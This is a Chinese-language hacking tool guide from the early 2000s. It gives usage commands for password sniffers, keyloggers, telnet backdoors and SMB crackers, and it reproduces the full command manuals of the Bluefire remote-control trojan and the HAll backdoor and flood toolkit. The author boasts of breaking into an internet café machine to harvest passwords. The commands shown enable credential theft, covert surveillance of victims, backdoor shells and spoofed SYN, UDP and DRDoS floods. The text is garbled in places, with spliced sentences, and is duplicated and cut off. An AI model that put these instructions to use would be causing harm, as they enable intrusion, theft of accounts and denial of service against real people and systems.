常用黑客工具介绍
扫描类的有:
流光 X-way SuperScan X-Scan
生成字典类的有:
黑客字典 字典专家 超级字典生成器 生日密码生成器
嗅探监听类的有:
X-Sniff Winsniff ARp-Killer ARPSniffer MyNetmon NetXray
键盘纪录类的有:
广外幽灵 血火
代理和跳板类的有:
代理猎手 Snake
后门类的有:
Hall hacktelnet BackDoor Rmistaller
winshell 蓝火
Win2000/NT密码破解类的有:
SMBCrack
扫描类的就没什么讲的了都是有用户界面的。只要输入对方的ip 进行扫描就行了。
生成字典类也比较简单也有界面,他会要你选择用什么生成字典是纯数字呢?还是字母等等。
嗅探类的我挑X-Sniff 来说:
X-Sniff 可捕获局域网内FTP/SMTP/POP3/HTTP协议密码。
运行参数说明:
xsniff
含义如下:
-tcp : 输出TCP 数据报
-udp : 输出UDP 数据报
-icmp : 输出ICMP 数据报
-pass : 过滤密码信息
-hide : 后台运行
-host : 解析主机名
-addr : 过滤IP 地址
-port : 过滤端口
-log : 将输出保存到文件
-asc : 以ASCII 形式输出
-hex : 以16进制形式输出
比如:
我入侵了xx 网吧的Host(这时已经telnet 上去了,哈哈!爽啊~~HOHOHO!),输入:
c:\xsniff.exe -hide -pass -log c:\winnt\pass.log
目录下的password 文件中!
键盘纪录的我比较喜欢用广外幽灵,他操作简单只要现在要纪录键盘的文件就行了。
代理的代理猎手是进行大面积的扫描代理只要输入IP 范围就ok 了!
后门类的我说说hacktelnet 他有2个文件分别是OpenTelnet ,ResumeTelnet 。
OpenTelnet.exe \\IP
:
0: 不使用 NTLM 身份验证。 这句话的意思是监听所有通过这台主机的密码(哈哈!比不一会什么邮箱账号,游戏账号一大把啊OpenTelnet 是用来打开对方的telnet 只有知道了对方的用户名和密码还有存在空连接就可以这样
1: 先尝试 NTLM 身份验证。如果失败,再使用用户名和密码。
2: 只使用 NTLM 身份验证。
(假设IP 为192.168.1.1,用户名为admin ,密码是:123456)
c:\opentelnet \\192.168.1.1 admin 123456 1 9000
这样我们就可以:
c:\telnet 192.168.1.1 9000
如果对方的密码为空可以这样:
c:\opentelnet \\192.168.1.1 admin "" 1 9000
另外那个ResumeTelnet 是用来恢复Telnet 配置的,并关闭Telnet 服务器,它的用法:
ResumeTelnet.exe \\ip
例如:
c:\resumetelnet \\192.168.1.1 admin 123456
这下就可以了!
另外附带一下hall 和蓝火的帮助文件。感兴趣的可以看看。
蓝色火焰0.5 Preview 2版帮助文档
==================================
●注意:从本版本开始,蓝色火焰的服务端由配置器生成!!!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^●使用本控制程序的基本条件是 ------有机器被你控制了,也就是说有机器被你装上了蓝色火焰服务端(由配置器生成的) !
接下来,喜欢上bbs 或者mud 的朋友就容易得多了,你把那台机当成一个bbs 或者mud 就可以了,
简单点也行,跟着我来吧:
你要做的很简单,就是打开windows(不一定哦) 开始菜单->运行->输入telnet xxx.xxx.xxx.xxx端口是固定的19191,如果连上(也就是你可以为所欲为的) ,你就会看到如下画面:
***************“蓝色火焰”服务器端.***************
*************** 版本: V 0.5 Preview 2„„ *************
*************** Copyright by Vinsa,2001.10******
Bluefire->
这是蓝色火焰的提示符,本程式需要在这个提示符下输入命令,以达到远程控制目的
========================================
命令详解帮助 :
1 help 显示简要帮助信息
2 exit 退出当前连接
3 ver 显示版本信息
4 list 列出当前进程
5 passwd 列出记录的密码信息
6 clearpw 清空记录的密码信息
7 sysinfo 列出计算机的详细信息
8 halt 挂起
9 screen 运行屏幕保护程序
10 sice? 检测是否运行了Soft-ice 如果有就„„
11 force 注销当前用户
12 logoff 注销
13 shutdown 关机
14 reboot 重启 这里xxx.xxx.xxx.xxx 是你控制那台机的IP 地址,怎么知道?$@#%#-----别问我哦,我也不知道
15 poweroff 强行关机
----------------------------------------------------------
16 kill [Process ID]
杀死进程,格式如kill fffec309 其中fffec309是进程号,可以用list 命令得到
----------------------------------------------------------
17 hide [desktop/taskbar/start/trayicon/clock]
隐藏„„,如
隐藏桌面: hide desktop
隐藏任务栏: hide taskbar
隐藏开始按钮: hide start
隐藏右下角图标: hide trayicon
隐藏时钟: hide clock
----------------------------------------------------------
18 show [desktop/taskbar/start/trayicon/clock]
显示„„
对应上面 „„
----------------------------------------------------------
19 disable [mouse/desktop/task/taskbar/start/cad]
锁定„„
锁定鼠标: disable mouse
锁定桌面: disable desktop
锁定任务栏:disable task
锁定开始按钮:disable start
锁定Ctrl+Alt+delete: disable cad
----------------------------------------------------------
20 enabled [mouse/desktop/task/taskbar/start/cad]
把上面锁定的解锁
----------------------------------------------------------
21 open [monitor/driver/ftp/http [dir]]
打开„„
打开显示器: open monitor
打开光驱: open driver
打开Ftp 服务器:
open ftp
打开后就可以用各种ftp 客户端控制,
比如cuteFtp,leechftp, 甚至Flashget 的站点资源探素器都可以进行浏览和文件管理
打开http 服务器:
open http c:\windows
这样表示以c:\windows为主目录进行web 发布,
当然可以用IE,Netscape,Opera 等等浏览器进行访问和下载文件
★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★
蓝色火焰0.4特色功能:
这一功能充满着幻想,用虚拟Web 页的形式
实现了用 浏览器(IE,Netscape,Opera等) :察看系统信息,察看(/清空) 捕获的密码, ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^看(/清空) 纪录的键盘,捕获屏幕,进程管理(列
相当于由一般的TCP/IP协议控制的木马转变成用http 协议控制超级木马,可以绕过一些防火墙,^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^要open http 然后
么简单!
也可以直接浏览捕获的屏幕图像
---------------------------------------
22 close [monitor/driver/ftp/http]
关闭„„
对应上面的
---------------------------------------
23 catch [Jpeg Filename]
捕获当前屏幕
如 catch c:\screen.jpg
然后可以open http c: 打开http 服务器,
在IE 的地址栏里输入
^^^^^^^^^^^^^^^
这些表示对方机器的IP 地址
http://XXX.XXX.XXX.XXX/screen.jpg就可以浏览到屏幕图像 http://xxx.xxx.xxx.xx^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^★★★★★★★★★★★★★★★★★★★★★★
open http
打开IE 输入http://xxx.xxx.xxx.xxx
选择抓取屏幕就ok 了
---------------------------------------
24 changeb [on/off]
交换鼠标左右键changeb on
还原鼠标左右键changeb off
---------------------------------------25 charspy [result/on/off] 查看击键记录:charspy result
禁止键盘记录:charspy off
开启键盘记录:charspy on (注意默认情况下已经开启)
(记录各种按键,结果不存盘)
---------------------------------------26 keyspy [result/on/off/clear] 查看击键记录:keyspy result
禁止键盘记录:keyspy off
开启键盘记录:keyspy on (注意默认情况下已经开启)
清空键盘纪录:keyspy clear
(这里和上面不同的是这里可以记录中文输入,并将结果存盘)
------------------------------------- snapexe 设置EXE 文件关连
28 unsnapexe 解除EXE 文件关连
---------------------------------------29 bladd [filename]/blview/blclear 黑名单管理(在关连了exe 文件后黑名单生效)
将程序加入黑名单用法:
bladd regedit(禁用注册表编辑器)
bladd skynet (禁用天网)
bladd msconfig
bladd qq2000 (这个太狠了,禁用oicq)
bladd windows(禁用windows 目录下所有东西)
bladd „„„„„„„„„„„„自己想加什么就加什么,看XXX 不爽就bladd XXX
查看当前黑名单 blview
清空当前黑名单 blclear
--------------------------------------
30 recstart[wav filename]/recstop/recstate
开始录制一段声音: recstart c:\test.wav
结束录制 : recstop
显示录音机当前状态 : recstate
------------------------------------
31 cmd [dos command line]
运行dos 命令:如
cmd dir
cmd type c:\test.txt
cmd del c:\msdos.sys(呵呵,这个删掉就麻烦了)
---------------------------------------
32 run [filename]
运行命令 如:
run c:\test.wav
run c:\windows\system\msconfig.exe
run c:\screen.jpg
--------------------------------------
33 chat [messages you want to send]
打开聊天窗口和被控机聊天
用法很简单, 如:
chat 你好
chat 你被我控制了
chat 你好可怜那
chat # (这个表示关闭聊天窗口)
--------------------------------------4 changetelnetport [port] 远程修改telnet 端口
用法如 changetelnetport 23
表示把telnet 端口修改为 23
服务端重启(restart)后生效
---------------------------------------------------------- 35 changeftpport [port]
远程修改ftp 端口
用法如 changeftpport 21
表示把ftp 端口修改为 21
服务端重启(restart)后生效
-------------------------------------
36 changehttpport [port]
远程修改http 端口
用法如 changehttpport 80
表示把http 端口修改为 80
服务端重启(restart)后生效
--------------------------------------
37 changepasswd [new password]
远程修改telnet 密码
用法如 changepasswd 123456
表示把telnet 密码修改为 123456
服务端重启(restart)后生效
------------------------------------
38 viewsetup
远程察看当前配置
-------------------------------------
39 restart
远程重启bluefire 服务端, 使修改的设置生效
====================================
V0.5 Preview 2 版 快捷命令列表:
l = list
k = kill
h = hide
s = show
c = catch
d = disable
e = enabled
! = cmd
r = run
: = chat
pw = passwd
cpw = clearpw
si = sysinfo
ks = keyspy
cs = chatspy
ks r = keyspy result
ks c = keyspy clear
cs r= charspy result
ctp = changetelnetport
cfp = changeftpport
chp = changehttpport
cpp = changepasswd
=======================================
AllinOne V0.4 for Win2000 使用说明书.
by lion.
======================================
d:\>dir HAll.exe
驱动器 D 中的卷没有标签。
卷的序列号是 8084-DE58
d:\ 的目录
2002-05-10 17:53 62,976 HAll.exe 1 个文件 62,976 字节
0 个目录 619,315,200 可用字节
d:\>HAll -h
======================= HUC AllinOne V0.40 for Win2000
= By Lion, Welcome to
http://www.cnhonker.net =================
[BackDoor:]
-start
-bind
-setup [ ]
[Files:]
-
[Flood:]
-
[Process:]
->
[System:]
-
[Scanner:]
-
[Services:]
-
[Transmit:]
-
/////////////////////////////////////////
AllinOne 0.3功能介绍
--------------------------------------------------------------------------------
1.Ping Backdoor(后门).
[BackDoor:]
1.1 本机默认安装一个ping backdoor.
-start
默认数据为:
密码为: kissme:)
监听包大小: 101
后门端口为: 138
1.2 本机开一个绑定了cmd shell的端口.
-bind
为验证密码.
为监听端口.
1.3 指定后门参数安装后门.
-setup [ ]
为后门的服务名.
为服务显示的名称.
为服务的描述.
为控制密码.
为监听端口, 为(1-65535).
为监听包的大小, 为(1-65000).
1.4 ping 后门的使用方法为:
ping TargetIP -l 101 -n 1
telnet TargetIP 138
其中的101,138分别改成你设定的参数.
--------------------------------------------------------------------------------
2. 文件操作.
[Files:]
[ ] 为远程安装选项, 分别指定远程IP, 用户名和密码.(必须为admini
-
2.1 下载Http 或FTP 文件功能.
-fget
为文件的Http 地址.
为文件的FTP 地址.
为下载文件要保存的路径和文件名.
2.2 安全擦除文件和目录功能.(从硬盘完全擦除)
-safedel [-p passes] [-s]
-safedel [-p passes] -z [Drive Letter]
[Opation:]
-p passes 重写的次数, 默认为:3
-s 擦掉所有子目录.
-z 清除
--------------------------------------------------------------------------------
3.DoS & Flood 功能.
[Flood:]
-
3.1 Ping Flood (为伪造源IP 进行ICMP Ping 洪水攻击.)
-ping
为要伪造的源IP, 也就是将要攻击的IP.
为将要利用的主机IP, 最好为一个广播地址. 如192.168.0.255
为发送的ICMP 包的大小. 为(1-65000)
为发送数据包之间的延时. 为(0-1000), 选0为无延时, 推荐为1.
因为收到一个ICMP 请求一般的主机都会返回一个回应.
如果一个广播地址192.168.0.255上有50台主机有ICMP 回应,
-ping 192.168.1.1 192.168.0.255 60000 1
将使192.168.1.1主机收到 6000 x 50倍的数据包.:)
3.2 UDP Flood.(为伪造源IP 和源端口, 对目标进行UDP 洪水攻击.)
-udp
为要伪造的源IP.
为要伪造的源端口. 为(0-65535),选0表示为每次攻击时变化源端口. 为将要攻击的主机IP.
为将要攻击的主机的端口, 为(0-65535),选0表示为每次攻击时变化目标端口. 为发送的UDP 包的大小. 为(1-65400)
为发送数据包之间的延时. 为(0-1000),选0为无延时, 推荐为1.
3.3 SYN Flood.(为伪造源IP 和端口, 对目标进行SYN 连接请求攻击.)
-syn
为要伪造的源IP.(可找任意互联网IP, 攻击中会在一个B 段内变化)
为要伪造的源端口. 为(0-65535).(可随便输入, 攻击中会自动变化)
为将要攻击的主机的IP.
为将要攻击的主机的端口, 比如80,21等.
原理为改变源地址和源端口, 发送大量的syn 连接请求到目标IP, 产生拒绝服务现象. 攻击能力大约为1.5W 次连接请求/s(未优化版).
-drdos
为将要攻击的主机的IP.
为将要攻击的主机的端口.
为将要利用的端口. 如21,80,179等等.
drdos 为利用发出的的syn 连接请求到一批活动的主机的开放端口, 也就是源地址是不变的, 利用活动主机返回的信息来淹没源地址IP, 产生flood 效果.
3.5
ICMP 和UDP 实际上是个比带宽的攻击方式.
参与攻击的机器少的情况下, -syn 更容易让目标瘫痪.
参与攻击的机器多的情况下, -drdos 让目标更难防御flood 攻击.
-------------------------------------------------------------------------------- 3.4 DRDoS Flood.(为分布式反射拒绝服务攻击.) ---其实是没多大利用价值. 不过看见有人讨论, 为将要利用的主机段.(找一个C 段内主机存活并开放特定端口多网段的, 攻击时, 这个
4. 进程操作.
[Process:]
->
4.1 查看端口跟进程的对应关系. 并找出进程的文件的具体位置.(fport)
-fport
4.2 查看当前进程列表.
-pslist
4.3 杀掉指定进程号的进程.
-pskill
为要杀掉的进程号, 可以用pslist 功能来查看具体的pid.
--------------------------------------------------------------------------------
5. 系统功能
[System:]
-
5.1 重启机器
-reboot
为立刻重启动机器.
5.2 关机.
-shutdown
为立刻关机.
5.3 关闭电源.
-power
为立刻关机, 并关电源.
--------------------------------------------------------------------------------
6. 扫描器功能.(由于Hscan 0.32源代码丢失, 暂时只有扫描端口(-xport)功能完成. 由Hscan 改
[Scanner:]
- [option]
6.1 端口扫描.(扫描目标机器开放的端口.)
-xport [Port1-Port2|Port1,Port2...] [Option]
[Opation:]
-b 取服务器返回信息.
-d:delay 扫描延时, 为(1-30),默认为 2s, 最大为60s.
-t:thread 扫描的线程, 为(1-1000),默认为200, 最大为1000.
为要扫描的主机名.
为要扫描的主机IP 或IP 段.
[Port1-Port2] 为要扫描的端口范围.
[Port1,Port2...] 为要扫描的端口列表.
如果没有端口信息, 将默认扫描内置的32个端口. 分别为:
21,22,23,25,53,79,80,110,111,113,123,135,139,143,443,445,
512,513,514,515,540,
1080,1433,1521,1524,3306,3389,5631,6000,8000,8080,12345
6.2 CGI漏洞扫描.
-xcgi [option]
[Options:]
-d:delay 扫描延时, 默认为4秒, 最大为60秒. 依网速而定.
-p:port 要扫描的WEB 端口.
-g:post 用POST 模式代替GET.
-t:thread 扫描进程, 默认为100, 最大为500.
-u:url 扫描单个URL.
--------------------------------------------------------------------------------
7. 服务操作. -f:file CGI漏洞列表文件, 如果文件不存在或者未指定, 将扫描内置的1319个CGI 漏
[Services:]
-
7.1 为列出本机或远程主机的服务.
-slist [ ]
all|running|win32|driver>
为列出所有服务.
为列出所有运行中的服务.
和 分别为要列出的服务的类型.
7.2 删除一个本机或远程主机的服务.
-sdel [ ]
为将要删除的服务名.
[ ] 同上.
7.3 启动一个本机或远程主机的服务.
-sstart [ ]
为将要启动的服务名.
[ ] 同上.
7.4 停止一个本机或者远程主机的服务.
-sstop [ ]
为将要停止的服务名.
[ ] 同上.
7.5 暂停一个本机或者远程主机的服务.
-spause [ ]
为将要暂停的服务名.
[ ] 同上.
7.6 查看一个本机或远程主机的服务的详细信息. [ ] 为远程查看服务选项, 分别指定远程IP, 用户名和密码.(必须为ad
-sview [ ]
为将要查看的服务名.
[ ] 同上.
7.7 为本机或者远程主机安装一个服务.
-install [ ]
为本机或远程主机安装一个服务.
为将要安装的服务名称.
为将要安装的服务的显示名称.
为作为服务运行的程序.(必须是服务程序)
--------------------------------------------------------------------------------
8. TCP包转发功能.
[Transmit:]
8.1 为监听两个端口, 把两个端口上接收到的数据做一个交换.
-listen
一个端口等待 slave来连接,
一个等待攻击者来连接.
如果两边都有连接进来, 把两边的数据做一个交换.
即 ListenPort AttackerPort
8.2 为普通包转发功能, 把本机的的某个端口上接收到的数据转发到指定IP 的端口上. -tran
即ListenPort DestIP->DestPort
为监听的端口
为你实际要连接的目标的IP.
为你实际要连接的目标的端口.
如:
-tran 23 192.168.0.1 23
把本机的23端口上接收到的数据转发到192.168.0.1的23端口, 并把192.168.0.1的23端的返 telnet localhost 23 实际上连接的是192.168.0.1的23端口.
8.3 为连接目标IP(TargetIP)的端口(TargetPort), 并连接另一个主机的监听端口.
-slave
3种方法结合, 理论上可以突破任意一种连上互联网的内网.
最后来说说SMBCrack 它是小榕写的速度很快
它的语法是:
smbcrack [端口]
为连接目标IP(TargetIP)的端口(TargetPort), 并连接另一个主机的监听端口, 并把两边的数据
常用黑客工具介绍
扫描类的有:
流光 X-way SuperScan X-Scan
生成字典类的有:
黑客字典 字典专家 超级字典生成器 生日密码生成器
嗅探监听类的有:
X-Sniff Winsniff ARp-Killer ARPSniffer MyNetmon NetXray
键盘纪录类的有:
广外幽灵 血火
代理和跳板类的有:
代理猎手 Snake
后门类的有:
Hall hacktelnet BackDoor Rmistaller
winshell 蓝火
Win2000/NT密码破解类的有:
SMBCrack
扫描类的就没什么讲的了都是有用户界面的。只要输入对方的ip 进行扫描就行了。
生成字典类也比较简单也有界面,他会要你选择用什么生成字典是纯数字呢?还是字母等等。
嗅探类的我挑X-Sniff 来说:
X-Sniff 可捕获局域网内FTP/SMTP/POP3/HTTP协议密码。
运行参数说明:
xsniff
含义如下:
-tcp : 输出TCP 数据报
-udp : 输出UDP 数据报
-icmp : 输出ICMP 数据报
-pass : 过滤密码信息
-hide : 后台运行
-host : 解析主机名
-addr : 过滤IP 地址
-port : 过滤端口
-log : 将输出保存到文件
-asc : 以ASCII 形式输出
-hex : 以16进制形式输出
比如:
我入侵了xx 网吧的Host(这时已经telnet 上去了,哈哈!爽啊~~HOHOHO!),输入:
c:\xsniff.exe -hide -pass -log c:\winnt\pass.log
目录下的password 文件中!
键盘纪录的我比较喜欢用广外幽灵,他操作简单只要现在要纪录键盘的文件就行了。
代理的代理猎手是进行大面积的扫描代理只要输入IP 范围就ok 了!
后门类的我说说hacktelnet 他有2个文件分别是OpenTelnet ,ResumeTelnet 。
OpenTelnet.exe \\IP
:
0: 不使用 NTLM 身份验证。 这句话的意思是监听所有通过这台主机的密码(哈哈!比不一会什么邮箱账号,游戏账号一大把啊OpenTelnet 是用来打开对方的telnet 只有知道了对方的用户名和密码还有存在空连接就可以这样
1: 先尝试 NTLM 身份验证。如果失败,再使用用户名和密码。
2: 只使用 NTLM 身份验证。
(假设IP 为192.168.1.1,用户名为admin ,密码是:123456)
c:\opentelnet \\192.168.1.1 admin 123456 1 9000
这样我们就可以:
c:\telnet 192.168.1.1 9000
如果对方的密码为空可以这样:
c:\opentelnet \\192.168.1.1 admin "" 1 9000
另外那个ResumeTelnet 是用来恢复Telnet 配置的,并关闭Telnet 服务器,它的用法:
ResumeTelnet.exe \\ip
例如:
c:\resumetelnet \\192.168.1.1 admin 123456
这下就可以了!
另外附带一下hall 和蓝火的帮助文件。感兴趣的可以看看。
蓝色火焰0.5 Preview 2版帮助文档
==================================
●注意:从本版本开始,蓝色火焰的服务端由配置器生成!!!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^●使用本控制程序的基本条件是 ------有机器被你控制了,也就是说有机器被你装上了蓝色火焰服务端(由配置器生成的) !
接下来,喜欢上bbs 或者mud 的朋友就容易得多了,你把那台机当成一个bbs 或者mud 就可以了,
简单点也行,跟着我来吧:
你要做的很简单,就是打开windows(不一定哦) 开始菜单->运行->输入telnet xxx.xxx.xxx.xxx端口是固定的19191,如果连上(也就是你可以为所欲为的) ,你就会看到如下画面:
***************“蓝色火焰”服务器端.***************
*************** 版本: V 0.5 Preview 2„„ *************
*************** Copyright by Vinsa,2001.10******
Bluefire->
这是蓝色火焰的提示符,本程式需要在这个提示符下输入命令,以达到远程控制目的
========================================
命令详解帮助 :
1 help 显示简要帮助信息
2 exit 退出当前连接
3 ver 显示版本信息
4 list 列出当前进程
5 passwd 列出记录的密码信息
6 clearpw 清空记录的密码信息
7 sysinfo 列出计算机的详细信息
8 halt 挂起
9 screen 运行屏幕保护程序
10 sice? 检测是否运行了Soft-ice 如果有就„„
11 force 注销当前用户
12 logoff 注销
13 shutdown 关机
14 reboot 重启 这里xxx.xxx.xxx.xxx 是你控制那台机的IP 地址,怎么知道?$@#%#-----别问我哦,我也不知道
15 poweroff 强行关机
----------------------------------------------------------
16 kill [Process ID]
杀死进程,格式如kill fffec309 其中fffec309是进程号,可以用list 命令得到
----------------------------------------------------------
17 hide [desktop/taskbar/start/trayicon/clock]
隐藏„„,如
隐藏桌面: hide desktop
隐藏任务栏: hide taskbar
隐藏开始按钮: hide start
隐藏右下角图标: hide trayicon
隐藏时钟: hide clock
----------------------------------------------------------
18 show [desktop/taskbar/start/trayicon/clock]
显示„„
对应上面 „„
----------------------------------------------------------
19 disable [mouse/desktop/task/taskbar/start/cad]
锁定„„
锁定鼠标: disable mouse
锁定桌面: disable desktop
锁定任务栏:disable task
锁定开始按钮:disable start
锁定Ctrl+Alt+delete: disable cad
----------------------------------------------------------
20 enabled [mouse/desktop/task/taskbar/start/cad]
把上面锁定的解锁
----------------------------------------------------------
21 open [monitor/driver/ftp/http [dir]]
打开„„
打开显示器: open monitor
打开光驱: open driver
打开Ftp 服务器:
open ftp
打开后就可以用各种ftp 客户端控制,
比如cuteFtp,leechftp, 甚至Flashget 的站点资源探素器都可以进行浏览和文件管理
打开http 服务器:
open http c:\windows
这样表示以c:\windows为主目录进行web 发布,
当然可以用IE,Netscape,Opera 等等浏览器进行访问和下载文件
★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★
蓝色火焰0.4特色功能:
这一功能充满着幻想,用虚拟Web 页的形式
实现了用 浏览器(IE,Netscape,Opera等) :察看系统信息,察看(/清空) 捕获的密码, ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^看(/清空) 纪录的键盘,捕获屏幕,进程管理(列
相当于由一般的TCP/IP协议控制的木马转变成用http 协议控制超级木马,可以绕过一些防火墙,^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^要open http 然后
么简单!
也可以直接浏览捕获的屏幕图像
---------------------------------------
22 close [monitor/driver/ftp/http]
关闭„„
对应上面的
---------------------------------------
23 catch [Jpeg Filename]
捕获当前屏幕
如 catch c:\screen.jpg
然后可以open http c: 打开http 服务器,
在IE 的地址栏里输入
^^^^^^^^^^^^^^^
这些表示对方机器的IP 地址
http://XXX.XXX.XXX.XXX/screen.jpg就可以浏览到屏幕图像 http://xxx.xxx.xxx.xx^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^★★★★★★★★★★★★★★★★★★★★★★
open http
打开IE 输入http://xxx.xxx.xxx.xxx
选择抓取屏幕就ok 了
---------------------------------------
24 changeb [on/off]
交换鼠标左右键changeb on
还原鼠标左右键changeb off
---------------------------------------25 charspy [result/on/off] 查看击键记录:charspy result
禁止键盘记录:charspy off
开启键盘记录:charspy on (注意默认情况下已经开启)
(记录各种按键,结果不存盘)
---------------------------------------26 keyspy [result/on/off/clear] 查看击键记录:keyspy result
禁止键盘记录:keyspy off
开启键盘记录:keyspy on (注意默认情况下已经开启)
清空键盘纪录:keyspy clear
(这里和上面不同的是这里可以记录中文输入,并将结果存盘)
------------------------------------- snapexe 设置EXE 文件关连
28 unsnapexe 解除EXE 文件关连
---------------------------------------29 bladd [filename]/blview/blclear 黑名单管理(在关连了exe 文件后黑名单生效)
将程序加入黑名单用法:
bladd regedit(禁用注册表编辑器)
bladd skynet (禁用天网)
bladd msconfig
bladd qq2000 (这个太狠了,禁用oicq)
bladd windows(禁用windows 目录下所有东西)
bladd „„„„„„„„„„„„自己想加什么就加什么,看XXX 不爽就bladd XXX
查看当前黑名单 blview
清空当前黑名单 blclear
--------------------------------------
30 recstart[wav filename]/recstop/recstate
开始录制一段声音: recstart c:\test.wav
结束录制 : recstop
显示录音机当前状态 : recstate
------------------------------------
31 cmd [dos command line]
运行dos 命令:如
cmd dir
cmd type c:\test.txt
cmd del c:\msdos.sys(呵呵,这个删掉就麻烦了)
---------------------------------------
32 run [filename]
运行命令 如:
run c:\test.wav
run c:\windows\system\msconfig.exe
run c:\screen.jpg
--------------------------------------
33 chat [messages you want to send]
打开聊天窗口和被控机聊天
用法很简单, 如:
chat 你好
chat 你被我控制了
chat 你好可怜那
chat # (这个表示关闭聊天窗口)
--------------------------------------4 changetelnetport [port] 远程修改telnet 端口
用法如 changetelnetport 23
表示把telnet 端口修改为 23
服务端重启(restart)后生效
---------------------------------------------------------- 35 changeftpport [port]
远程修改ftp 端口
用法如 changeftpport 21
表示把ftp 端口修改为 21
服务端重启(restart)后生效
-------------------------------------
36 changehttpport [port]
远程修改http 端口
用法如 changehttpport 80
表示把http 端口修改为 80
服务端重启(restart)后生效
--------------------------------------
37 changepasswd [new password]
远程修改telnet 密码
用法如 changepasswd 123456
表示把telnet 密码修改为 123456
服务端重启(restart)后生效
------------------------------------
38 viewsetup
远程察看当前配置
-------------------------------------
39 restart
远程重启bluefire 服务端, 使修改的设置生效
====================================
V0.5 Preview 2 版 快捷命令列表:
l = list
k = kill
h = hide
s = show
c = catch
d = disable
e = enabled
! = cmd
r = run
: = chat
pw = passwd
cpw = clearpw
si = sysinfo
ks = keyspy
cs = chatspy
ks r = keyspy result
ks c = keyspy clear
cs r= charspy result
ctp = changetelnetport
cfp = changeftpport
chp = changehttpport
cpp = changepasswd
=======================================
AllinOne V0.4 for Win2000 使用说明书.
by lion.
======================================
d:\>dir HAll.exe
驱动器 D 中的卷没有标签。
卷的序列号是 8084-DE58
d:\ 的目录
2002-05-10 17:53 62,976 HAll.exe 1 个文件 62,976 字节
0 个目录 619,315,200 可用字节
d:\>HAll -h
======================= HUC AllinOne V0.40 for Win2000
= By Lion, Welcome to
http://www.cnhonker.net =================
[BackDoor:]
-start
-bind
-setup [ ]
[Files:]
-
[Flood:]
-
[Process:]
->
[System:]
-
[Scanner:]
-
[Services:]
-
[Transmit:]
-
/////////////////////////////////////////
AllinOne 0.3功能介绍
--------------------------------------------------------------------------------
1.Ping Backdoor(后门).
[BackDoor:]
1.1 本机默认安装一个ping backdoor.
-start
默认数据为:
密码为: kissme:)
监听包大小: 101
后门端口为: 138
1.2 本机开一个绑定了cmd shell的端口.
-bind
为验证密码.
为监听端口.
1.3 指定后门参数安装后门.
-setup [ ]
为后门的服务名.
为服务显示的名称.
为服务的描述.
为控制密码.
为监听端口, 为(1-65535).
为监听包的大小, 为(1-65000).
1.4 ping 后门的使用方法为:
ping TargetIP -l 101 -n 1
telnet TargetIP 138
其中的101,138分别改成你设定的参数.
--------------------------------------------------------------------------------
2. 文件操作.
[Files:]
[ ] 为远程安装选项, 分别指定远程IP, 用户名和密码.(必须为admini
-
2.1 下载Http 或FTP 文件功能.
-fget
为文件的Http 地址.
为文件的FTP 地址.
为下载文件要保存的路径和文件名.
2.2 安全擦除文件和目录功能.(从硬盘完全擦除)
-safedel [-p passes] [-s]
-safedel [-p passes] -z [Drive Letter]
[Opation:]
-p passes 重写的次数, 默认为:3
-s 擦掉所有子目录.
-z 清除
--------------------------------------------------------------------------------
3.DoS & Flood 功能.
[Flood:]
-
3.1 Ping Flood (为伪造源IP 进行ICMP Ping 洪水攻击.)
-ping
为要伪造的源IP, 也就是将要攻击的IP.
为将要利用的主机IP, 最好为一个广播地址. 如192.168.0.255
为发送的ICMP 包的大小. 为(1-65000)
为发送数据包之间的延时. 为(0-1000), 选0为无延时, 推荐为1.
因为收到一个ICMP 请求一般的主机都会返回一个回应.
如果一个广播地址192.168.0.255上有50台主机有ICMP 回应,
-ping 192.168.1.1 192.168.0.255 60000 1
将使192.168.1.1主机收到 6000 x 50倍的数据包.:)
3.2 UDP Flood.(为伪造源IP 和源端口, 对目标进行UDP 洪水攻击.)
-udp
为要伪造的源IP.
为要伪造的源端口. 为(0-65535),选0表示为每次攻击时变化源端口. 为将要攻击的主机IP.
为将要攻击的主机的端口, 为(0-65535),选0表示为每次攻击时变化目标端口. 为发送的UDP 包的大小. 为(1-65400)
为发送数据包之间的延时. 为(0-1000),选0为无延时, 推荐为1.
3.3 SYN Flood.(为伪造源IP 和端口, 对目标进行SYN 连接请求攻击.)
-syn
为要伪造的源IP.(可找任意互联网IP, 攻击中会在一个B 段内变化)
为要伪造的源端口. 为(0-65535).(可随便输入, 攻击中会自动变化)
为将要攻击的主机的IP.
为将要攻击的主机的端口, 比如80,21等.
原理为改变源地址和源端口, 发送大量的syn 连接请求到目标IP, 产生拒绝服务现象. 攻击能力大约为1.5W 次连接请求/s(未优化版).
-drdos
为将要攻击的主机的IP.
为将要攻击的主机的端口.
为将要利用的端口. 如21,80,179等等.
drdos 为利用发出的的syn 连接请求到一批活动的主机的开放端口, 也就是源地址是不变的, 利用活动主机返回的信息来淹没源地址IP, 产生flood 效果.
3.5
ICMP 和UDP 实际上是个比带宽的攻击方式.
参与攻击的机器少的情况下, -syn 更容易让目标瘫痪.
参与攻击的机器多的情况下, -drdos 让目标更难防御flood 攻击.
-------------------------------------------------------------------------------- 3.4 DRDoS Flood.(为分布式反射拒绝服务攻击.) ---其实是没多大利用价值. 不过看见有人讨论, 为将要利用的主机段.(找一个C 段内主机存活并开放特定端口多网段的, 攻击时, 这个
4. 进程操作.
[Process:]
->
4.1 查看端口跟进程的对应关系. 并找出进程的文件的具体位置.(fport)
-fport
4.2 查看当前进程列表.
-pslist
4.3 杀掉指定进程号的进程.
-pskill
为要杀掉的进程号, 可以用pslist 功能来查看具体的pid.
--------------------------------------------------------------------------------
5. 系统功能
[System:]
-
5.1 重启机器
-reboot
为立刻重启动机器.
5.2 关机.
-shutdown
为立刻关机.
5.3 关闭电源.
-power
为立刻关机, 并关电源.
